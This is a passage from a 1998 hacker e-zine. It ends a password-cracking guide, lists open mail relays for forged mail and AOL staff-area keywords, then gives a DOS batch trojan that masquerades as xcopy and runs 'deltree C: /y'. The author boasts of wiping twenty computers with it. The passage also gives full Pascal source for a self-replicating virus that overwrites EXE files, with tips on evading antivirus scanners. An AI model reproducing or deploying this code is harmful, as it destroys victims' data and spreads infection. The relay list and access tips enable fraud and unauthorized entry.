nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no b
(notice the c) if you don't know what this means it means the password
file is shadowed and you cannot work out the passwords for a shadowed
password file then you're in bad luck, I would recommend trying the ftp
hack prior to this for the best results.
If some but not all logins have a * in them then it's ok, it's worth while
getting the ones which aren't shadowed, hey a shell is a shell!!!
If you want to use your newly acquired shells then telnet to the site and
put in the login and the password (remember you have to crack the password
file first explained at the top).
Anyway that's it for now hope at least some people benefited from this guide.
Please send Comments, Questions, and Death threats to. But please no
mailbombs i feel so sorry for you when i have to fry your asses...
Acidmeister@hotmail.com
Or visit him at.
http://www.hackersweb.com
For the ultimate list of hacking guides and toolz of the trade.
Or you can find him on
Chat.yahoo.com as AcidMeister the one and only
Disclaimer:
This is for Educational purposes only it should not be used as a guide to
cause havoc or to hack. He He He, good luck!!! And don't get caught. I
would hate to see you in a cell with your 300 pound Bruno The Gay Ax
murderer. He He He
Thanx to Samantha and BliNdfire.
Copyright AcidMeister...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
11. Some Relaying-Server
by the file ripper
tfr@gmx.net
March 23, 1998
You know this !? You want to send a fake mail (a anonymous mail), but
you don't know a relaying server !? here are some...
Note : Don't forget ... telnet in with port 25 !! or use them in your
anonymous mail sender...
128.236.1.1
128.236.8.2
128.236.8.3
128.236.8.4
128.248.100.50
130.127.200.5
146.126.86.241
155.229.6.2
192.41.21.66
192.41.3.129
192.41.3.130
192.80.63.129
192.9.25.1
192.9.9.1
194.198.118.11
198.161.98.129
199.170.121.4
199.2.194.14
199.222.42.2
204.124.208.102
204.134.8.1
204.174.16.1
204.201.231.46
204.94.125.125
205.138.99.197
205.214.51.15
206.72.10.199
agora.rdrop.com
Aspen.CO.US.StarLink.Org
babylon.beyondirc.net
blacklodge.c2.org
blackmagic.sorcery.net
Cinci.OH.US.StarLink.Org
Cleveland.OH.US.Starlink-IRC.Org
communications.com
conexis.es
cvo.oneworld.com
cyberpass.net
davis.DAL.net
davis.oz.org
deathstar.sorcery.net
demonspawn.inna.net <-- GhostHawk's 1st choice
dhp.com
dreamon.com
elux3.cs.umass.edu
fruit.com
gulf.com
harborside.com
hidden.net
hkstar.com
host.net
idt.net
ime.net
interlink-bbs.com
irc.anet-chi.com
irc.aohell.org
irc.badgerden.com
irc.beachin.net
irc.dal.net
irc.havenet.com
irc.io-online.com
irc.liii.com
irc.limited.net
irc.localhost.net
irc.localnet.com
irc.mwweb.com
irc.oglobo.com.br
irc.tech.uh.edu
irc.thor.net
irc.tscnet.com
irc.xtatix.com
irc2.inficad.com
jeflin.tju.edu
lightning.mgl.ca
lords.com
LosAngeles.CA.US.ChatNet.Org
Losangeles.ca.us.Kidsworld.org
lycaeum.org
mail.acilink.org
mail.sojourn.com <-- the file ripper's 1st choice
mail.tds.net
mail.utexas.edu
mailmasher.com
malasada.lava.net
mind.com
mindijari.DAL.net
monsoon.com
nccn.net
neato.ca.us.another.net
netacc.net
netvision.net
nexus.flash.net
northernnet.com
nymserver.com
ocean.us.austnet.org
Philadelphia.PA.US.Ultranet.Org
post1.com
postoffice.com
pt.cyanamid.com
relay.net
remail.obscura.com
remailer.nl.com
rigel.cyberpass.net
russia.com
sandiego.ca.us.undernet.org
scorpion.latech.edu
scsnet.com
seidata.com
server.com
SF.CA.US.Chatnet.Org
sos.net
southernco.com
space.net
sprynet.com
StrathRoy.ON.CA.Cobra.Net
sunrise.ca.us.another.net
telephone.com
ucinet.com
vader.institute.wnyric.org
viphosting.com
vivanet.com
voyager.DAL.net
WalnutCreek.CA.US.ChatNet.Org
webfire.tx.us.icenet.org
webmaster.us.austnet.org
www.acc.af.mil
www.iowa.net
www.montana.net
www.netforward.com
xs4all.nl
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
12. AOL-Gateways
by AcidMeister
warming@vol.com
aol://4344:1186.Gateway.3685343.498065448
Guide Rainman:
aol://4344:1186.guide.3682978.488405094
Guide Conf Room:
aol://4344:1186.ConfRms.3685342.498065107
Guide Libaries:
aol://4344:1186.ResLib.3685341.498053484
ARC:
aol://4344:666.arcform.860809.504463074
Community Center:
aol://4344:1186.comcen.3683158.490570698
Rainman Cmds:
aol://4344:1.rmc.70682.473023645
S&S Policy:
aol://4344:223.pnp.91463.482279948
Special Acnts:
aol://4344:223.specacct.89721.481584812
Search Stuff
aol://4344:204.z66proj2.1845884.505890733
OH account
aol://4344:20.oh1te.92384.497065962
About Special Affinity/Account Groups
aol://4344:223.affingrp.89731.481585326
CNN
aol://4344:223.cnn.89754.481594657
DEMO Accounts
aol://4344:223.demo.89755.481594657
Special Account Descriptions
aol://4344:223.specacct.89721.481584812
April Promo Codes
aol://4344:223.aprilpr.96692.512240264
Promotion Codes
aol://4344:223.promocd.6558384.500850050
Marketing Info
aol://4344:223.markting.6558102.500754022
Did You Know???
aol://4344:223.helpdocs.84876.494254534
Guide Program
aol://4344:1186.guide.3682978.488405094
Conference Room Backdoors
aol://4344:243.mainconf.5964915.500442609
Info on The Americaonline Service
aol://4344:666.userinfo.860961.505079464
Host/IP list
aol://4344:204.rslists.67146.468717561
Visual Publisher for WIndows
aol://4344:1.vis_pubw.72126.491927210
Vogel Verlag
aol://2719:3-524
TV Today Chat
aol://2719:3-602
Legal Pad
aol://2719:3-599
In The Soup
aol://2719:3-600
Index by Forum Name
aol://4344:204.cdinf.79776.495161900
Canadian Software
aol://4344:223.canad2.6602532.512279521
Examine Object Information
aol://4344:204.examine1.71162.473812954
VLA Adam's Private Area
aol://4344:204.a37area.6616266.517541277
VirtuaLeader Academy's VirtuaLab
aol://4344:204.vlalab$.68347.469068066
Search America Online (Everywhere)
aol://4344:683.vlasrch.6164889.505527591
VLA Private Area Backlink
aol://4344:204.vlapage.6567454.503558406
Top Secrets
aol://4344:409.secrets.6553845.498835541
In the Sand - XXX
aol://4344:613.sand.3475361.491812962
Computing Channel Internet
aol://4344:1454.comp_cha.3407965.483568458
WebRequest
aol://1391:40-31999
AOL pointers newstand
aol://4344:559.newslet.4129994.494194276
Forms:
aol://4344:1.formscat.71914.474386750
TLA app
aol://4344:20.tlaapp1.125506.492637725
Shower Scene
aol://4344:613.shower.3475360.491812517
AOL 1.5 - Access
aol://4344:226.llIl.2755674.520114429
Security code: 3675
Boo Boo Pic
oob oob
AOL - Nutzer
100000
Changes Color of Chat Room
color
Secret Area
TYGER
In the Sand
20.aol://4344:613.sand.3475361.491812962
Shaggy Pic
yggahs
Yogi Pic
igoy
AOL Resource Center Message Boards
aol://5863:126/mB:51014
APPLY TO BE A BETA TESTER
aol://1722:beta%20apply
Remote Staff Lounge
aol://4344:1165.stafflng.3349013.515879444
Josie Pic
eisoj
Papa Smurf Pic
frumsapap
Secret Staff Access
aol://1722:gstaff
Nipples Aweigh
aol://4344:773.HOTNIP1.6843825.521317437
Entertainment Promo
aol://4344:754.entspot.6684982.499022815
Barney is a Nazi
aol://4344:1165.barney.3353269.522706580
Programming Area
Teenz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
13. Trojaning
by the file ripper
tfr@gmx.net
May 30, 1998
What is trojaning ?
Remember the story with the city trojan ?
The greeks couldn't defeat the trojans, so they used a trick.
The greeks gave the trojans a present. A wooden horse and the
belly was hollow. In the empty belly the put in the best warrios.
The silly trojans take the horse into their city and they celebrate
the victory. After all trojans are drunken the warrios came out,
and so they defeated finally the trojans ... by the way : The horse
was later on called the "trojan horse"...
In the Computerworld it's exactly the same. A *evil* program is hidden
in an helpful programm.
For what is trojaning used ??
Let's see ... ;) I just told you the greeks defeated with this trojan
horse the trojans ... now what do you think for what are this little
programmz used ?? For gaining access ... Let's say you give a trojan
to an sysadmin and he runs the programm from his admin-account, so the
programm is able to access more things than you as a normal user.
Let's say you want to change the password of the admin ... with a
trojan you can make it! The only problem is, that trojaning (mostly) only
works in systems like Novell or Win/Dos/Unix-based systems.
How do I trojan a system ??
In Dos (=Disk owning system ;) you can easily make a trojan by using
script files. In Dos script files are called Batch. It's like you give
in commands in the Dos, but you don't have to type every single command
in... oh yeah ... the extention for Batchfiles is .BAT
example :
if you type in in DOS :
DIR
then something like this appears (sorry all in german;) :
Datentr�ger in Laufwerk D: TFR
Seriennummer des Datentr�gers: 1234-1234
Verzeichnis von T:\TFR\TFR
. <DIR> 05-30-98 1:31a .
.. <DIR> 05-30-98 1:31a ..
1 TXT 40,545 05-30-98 1:31a 1.txt
BATCH BAT 3,459 05-30-98 1:31a batch.bat
3 TXT 1,231,230 05-30-98 1:31a a.txt
3 Datei(en) 1,274,134 Bytes
2 Verzeichnis(se) 110,562,366,976 Bytes frei
that means :
BATCH BAT 3,459 05-30-98 1:31a bAtCh.BaT
| | | | | |
| | | | | |- Win95 Name
| | | | |- Creation time
| | | |- Creation date
| | |-Filesize (=3 KB and 459 bytes ...)
| |-Extention
|-First Name ;)
if you want to run this file, just type in BATCH <enter>
(note : don't type in <Enter> ;)
Ok, now I show you how I programmed my first trojan :
first change into the system-dir by typing in "cd <dir>".
In MS-Dos systems the system-dir is noramlly C:\dos\, in
windows-based systems c:\windows\command\
then start the editor by typing in "edit xcopy.bat"
ok, now type in the following commands (note : don't write the
things marked with ";")
@echo off ;hide all commands
copy %1 %2 ;do the helpful part
deltree C: /y ;kill C:, every file ...
That's it. Oh yeah. Now exit the editor and enter the following command :
"del xcopy.exe". Ok, now you installed the trojan. When someone is now
running xcopy it will work correctly, but after he reboots the system is
empty...;)
I used this little programm on a computersystem with more
than 20 computers ... every single computer was killed ;)
If the system is compress with Drivespace or Doublespace it's easier.
Just type change "deltree C: /y" to "deltree h: /Y" ...
In Drivespace/Doublespace the real partition is saved on the Drive H:
If you work on C:, before you start a file the file will be decompressed
from drive H:. If you delete H: (note : msdos won't let you format this
drive!) all is away ... even the partition is away ;). That means not
even the best recovery programm can recover the programmz...
That was one of the easy ways. On every system, there is a big diffrence
how to trojan it.
I don't want to show you more of my trojans because I noticed if I write
many possiblities the dudes reading it, get lazy and only copy my trojans.
And I think you should be able to write your own. There are no limits.
You can use about every program to make it. I programmed some in Pascal.
Not because it's fast or something like this. But I programmed about 4
years in Pascal and I'm able to make about every programm in it ;)... so
I like this language best. C++ is also great, but I hadn't enough time
latly to check out all commands... But if you want to programm really
professional Trojans use Assembler (ASM) it's the only real programming
language! Only to activate your brain : In Novell you can change your
password by typing in a command - I cann't remember well, but I think
it was "setpass <oldpassword> <newpassword>" (or something like this).
Hope you got now some new ideas and show the admins who rules ;)
Some words :
- If you mail me, please write short messages. I mostly have not much
time and if I get a message that is short I can answer more message
in the same time! Oh yeah, if you don't get a message soon, don't
get mad, if you don't receive a reply message within 2 weeks mail me
again! (tfr@gmx.net)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
14. Programming Virii
by the file ripper
tfr@gmx.net
May 30, 1998
Before I start talking about programming Virii, what is an Virus ?
(Note : Virii is the pluralform from Virus ;)
And virus is an program, that repoduce itselfs by copying his code
onto a normal file, so the virus can spread hisself over the whole
harddisk. Normally this causes problems. In many cases the Virus
has also some evil functions implanted, like formating the harddisk
on the 1st of April or some other jokes. To become a good virus programm
you need to know well Assembler. If I talk about programming Virii, I don't
mean getting a virus-creation set and saying the computer what the virus
should do and the creation set will do all the programming work for you...
that's really lame. These Virus are easier to detect, then a elephant in
a house made of glass ;). But there are also some tricks to make your virus
undetectable by any Virusscanner, they keyword is "polymorph", that means
everytime the virus infects a new file, his code changes, the virus
programms itselfs new... (one of the difficult ways). But over the time
I found a way how to make even Virii like Jerusalem.Standard undetectable,
but I will describe this later on in my text.
First, choose the programming language you know best.
In my case it's Pascal (language between Basic and C++)
The second step, is thinking of how the Virus repoduce itselfs. There
are many possiblities. The easiest one is "overwritting", that means
everytime the virus infects the file, the virus replaces all the code of
the programm with itselfs. But this is very conspicuous, so the some
programmer developed some other methode like adding ... (means, that
the virus don't changes anything on the Programm, the Programm is runable,
evertime the programm is started the virus is loaded in the Memory and
infects every programm, that the user run.). But this one is also
a bit conspicuous, because the filesize changes. Again some programmers
had a better idea. Normally in FAT16 (MSDOS) every file you create needs
from the beginning 16KB - 32KB (because of the blocks). That means if you
created a file and only type in 1 single letter, you waste about 16-32KB.
And Virii use this slack (it's called like this) for there code. There
are even Virii out there, that do "steahling". That means if they are in
memory not even virusscanners are able to detect them. Even if you do
"dir" and the virus is in memory the filesize hasn't change. But if the
virus is not in the memory mostly the filesize has changed, so this is
also one of the complicated variants, because you need much informations
about MSDOS systems and how the work (vectors,interrupts...).
In my case I take the easiest on ... Overwritting.
Ok. The next step is programming ;)
-- BEGIN of VIRUS.PAS --
{$M 8192,0,0}
USES Dos;
VAR Command : STRING[79];
R:STRING;
PROCEDURE Infect;
VAR A,F:FILE;
NumRead, NumWritten: Word;
Buf: array[1..2048] of Char;
BEGIN
Assign(F,Command+'.EXE');
{$I-}
Reset(F,1); {check if file exists}
{$I+}
IF IoResult=0 THEN
BEGIN
ReWrite(F,1); {overwrite file, which just started}
Assign(A, Paramstr(0));
Reset(A,1); {filepointer=0, where the virus is saved}
REPEAT {copy the code}
BlockRead(A, Buf, SizeOf(Buf), NumRead);
BlockWrite(F, Buf, NumRead, NumWritten);
UNTIL (NumRead = 0) OR (NumWritten <> NumRead);
Close(A);
Close(F);
END;
END;
BEGIN {MAIN Procedure}
REPEAT
GetDir(0,R);
Write(r,'>'); {write the dir}
Readln(Command);
IF Command<>'' THEN
BEGIN
SwapVectors;
Exec(GetEnv('COMSPEC'), '/C '+Command);
SwapVectors;
Infect; {Infect the file}
IF DosError <> 0 THEN
Writeln('Could not execute COMMAND.COM');
END;
Writeln;
UNTIL 1=2; {endless loop}
END.
-- END of VIRUS.PAS --
Yeah, I only built in the important informations. Normally you can also
build in some things like after 10 commands it writes "fuck you" or formats
your harddisk, and stuff like this. But VIRUS.PAS is harmless, after it
was started it is resistent (it creats a new dos-shell) and every file
that is started, which is an exe-file will get infected.
You only have to compile VIRUS.PAS with the pascal-compiler (tpc),
after that the file should have a size of exactly 4,460 KBytes. But
the Virus is a bit big. You can make the file smaller by using Pklite.
PkLite also can be used to make normal Virii, that are detectable by nearly
every Virusscanner, undetectable. Because many Virusscaner search for
special strings in the Virus-code, you can make the Virus undetectable
by compressing it with programms like PkLite or some File-Protection Programz.
That's it ... I hope you enjoyed the text, if you liked it, write
me some comments to : tfr@gmx.net -thanx-.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
15. XXX/Porno
by the file ripper
tfr@gmx.net
May 30, 1998
Because I get every day many mails, only asking for XXX passwords, I
decided to add this little section to this magazine.
First of all ... I know many are ONLY interessted in stuff like this, they
learn hacking ONLY for gaining access to XXX/Porno, but this guys are
LAMERZ. Hacking is for gaining informations, not for sexual arouse!!!
PLEASE DON'T MAIL ME IF THIS TECHNIQUE WRITTEN HERE DON'T WORKS!
I DON'T GIVE ANY SUPPORT ON THIS CRAP!
There are 3 possiblities.